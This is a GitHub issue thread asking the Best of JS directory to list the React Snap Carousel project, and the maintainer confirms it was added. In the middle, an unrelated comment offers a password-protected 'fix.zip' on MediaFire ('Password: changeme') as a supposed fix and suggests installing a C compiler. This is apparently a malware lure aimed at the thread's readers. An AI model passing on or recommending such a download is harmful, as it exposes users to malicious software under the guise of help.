### ISSUE TITLE
Add React Snap Carousel

### ISSUE THREAD

**Issue by xeusteerapat** [michaelrambeau/bestofjs#1007]
**Please briefly describe the project you'd like to add to _Best of JS_?**
- DOM-first, headless carousel for React

**What is the GitHub repository of the project you'd like to add to _Best of JS_?**
- https://github.com/richardscarrott/react-snap-carousel

**Before submitting the request to add a new project, please check the following points:**

- [x] The project is related to the web platform or Node.js
- [x] The source code is on GitHub and project has more than 100 stars on GitHub
- [x] The project has thorough documentation in English
- [x] The project is not deprecated and actively maintained

**How would this project be tagged? (Pick one or several existing tags from this list: https://bestofjs.org/tags)**
- Slider
- React

**Also you can suggest new tags to add if you think _Best of JS_ is missing useful tags.**

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

**Comment by michaelrambeau** [comment]
Thank you @xeusteerapat `React Snap Carousel` is available on _Best of JS_.

https://bestofjs.org/projects/react-snap-carousel
